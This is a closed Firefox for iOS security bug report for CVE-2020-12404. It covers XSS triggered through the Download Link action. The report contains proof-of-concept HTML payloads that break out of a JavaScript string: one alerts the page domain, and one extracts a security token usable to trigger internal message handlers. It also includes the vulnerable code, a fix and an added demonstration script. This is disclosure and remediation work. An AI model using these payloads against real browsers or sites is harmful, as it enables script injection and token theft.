Closed Bug 1631739 (CVE-2020-12404) Opened 2 years ago Closed 2 years ago

XSS from booby-trapped link on Firefox iOS Download Link Action

(Firefox for iOS :: General, defect, P1)

Tracking Status
fxios 26 ---

(Reporter: vinothsparrow, Assigned: garvan)

(Keywords: csectype-sop, sec-moderate, Whiteboard: [reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high])

(2 files)

Attached file firefox-ios.html

Firefox Version: v24.1
OS: iOS 13.3.1

Issue: Universal XSS on Firefox iOS Download link Action


A Firefox iOS user clicks the Download Link option for a hyperlink, and XSS is triggered on the current URL when the hyperlink is in the format https://anydomain/','123');alert(document.domain);//

Sample attack scenario

Steps to reproduce:

  1. Open your iOS Firefox browser.
  2. Hold the link until the preview popup appears.
  3. Click Download Link.
  4. XSS is triggered.

Root Cause:

The unescaped URL of the link is being appended to the JavaScript when the download action is clicked

currentTab.webView?.evaluateJavaScript("'\(url.absoluteString)', '\(UserScriptManager.securityToken)')")


let safeUrl = url.absoluteString.replacingOccurrences(of: "'", with: "%27")
currentTab.webView?.evaluateJavaScript("'\(safeUrl)', '\(UserScriptManager.securityToken)')")

Youtube Unlisted Video:

<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<title>Firefox Universal Download Link XSS POC</title>
<a href="','123');alert(document.domain);//">Download Link in Firefox</a><br><br>

Flags: sec-bounty?

Garvan, can you help prioritize this? I don't have an iOS device but the write-up in comment #0 looks pretty serious.

Group: firefox-core-security → mobile-core-security
Type: task → defect
Component: Security → General
Flags: needinfo?(gkeeley)
Product: Firefox → Firefox for iOS
Flags: needinfo?(gkeeley)

Also, with this issue the attacker can get the security token value in the XSS. Using the security token, the attacker can trigger webkit.messageHandlers events (loginsManagerMessageHandler, printHandler, sessionRestoreHelper, etc.)

Payload to get the security token:

<a href="https://domain/','123');a=eval(decodeURIComponent('(function(a,b){alert(b);})'));a('1">XSS</a>

The above payload will alert the security token.

Assignee: nobody → gkeeley
Priority: -- → P1
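The string-building defect from comment #0 and the token leak from the comment above, reproduced as an added example (not Firefox iOS code): `download` is a hypothetical stand-in for the function name the report elides, TOKEN is a constructed placeholder, and the hardened builder uses JSON.stringify rather than a single-character replacement because it escapes every quote, backslash and control character that could end a JavaScript string literal.

```javascript
// Added example (not Firefox iOS code). The download action interpolates the
// link URL into JavaScript source; `download` is a hypothetical stand-in for
// the function name elided in the report, TOKEN a constructed placeholder.
const TOKEN = 'constructed-security-token';

// Vulnerable builder: a ' inside the URL terminates the literal and the rest
// of the URL is executed as code, with the token still appended as argument.
function buildScriptVulnerable(url) {
  return `download('${url}', '${TOKEN}')`;
}

// Hardened builder: JSON.stringify emits a valid JS string literal, escaping
// quotes, backslashes and control characters, so no URL can break out.
function buildScriptSafe(url) {
  return `download(${JSON.stringify(url)}, ${JSON.stringify(TOKEN)})`;
}

// Execute a built script with stubbed download/alert/document so we can
// observe what it does (stands in for what evaluateJavaScript runs in the page).
function run(script) {
  const calls = { download: null, alert: null };
  new Function('download', 'alert', 'document', script)(
    (url, token) => { calls.download = [url, token]; },
    (msg) => { calls.alert = String(msg); },
    { domain: 'victim.example' },
  );
  return calls;
}

// The two hrefs from the report: the first runs script in the current page,
// the second captures the second argument (the security token).
const XSS_LINK = "https://anydomain/','123');alert(document.domain);//";
const TOKEN_LINK = "https://domain/','123');a=eval(decodeURIComponent('(function(a,b){alert(b);})'));a('1";

function demo() {
  return {
    vulnXss: run(buildScriptVulnerable(XSS_LINK)),
    vulnToken: run(buildScriptVulnerable(TOKEN_LINK)),
    safeXss: run(buildScriptSafe(XSS_LINK)),
    safeToken: run(buildScriptSafe(TOKEN_LINK)),
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

With the vulnerable builder the first link calls alert with the page's domain and the second alerts the token itself; with the hardened builder both links arrive at `download` as a plain URL string and alert is never called.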

Landed for v25 of Firefox iOS, the next release.

Closed: 2 years ago
Resolution: --- → FIXED
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high]

It's not exactly a "Universal" XSS -- the attacker can't pick any arbitrary victim site. The target site has to be one where users can add links (which is still a large number of popular sites, especially social ones) and a context where the victim will want to download the link rather than click on it to open.

Summary: Universal XSS on Firefox iOS Download Link Action → XSS from booby-trapped link on Firefox iOS Download Link Action
Group: mobile-core-security → core-security-release

CVE for v25 was missed for this bug, assigning it to v26 in order to get picked up by the release notes process.
The bug is the same type of attack, leaking the token, and did have a sec advisory for v25.

tracking-fxios: --- → 26
Attached file advisory.txt

Can you add a CVE to this bug? Thanks

$ ./ 26
Generating advisories for Firefox for iOS Version 26
1631739 is missing a CVE identified....

Flags: needinfo?(dveditz)

Use CVE-2020-12404 for this one.

Alias: CVE-2020-12404
Flags: needinfo?(dveditz)
Flags: sec-bounty? → sec-bounty+
Group: core-security-release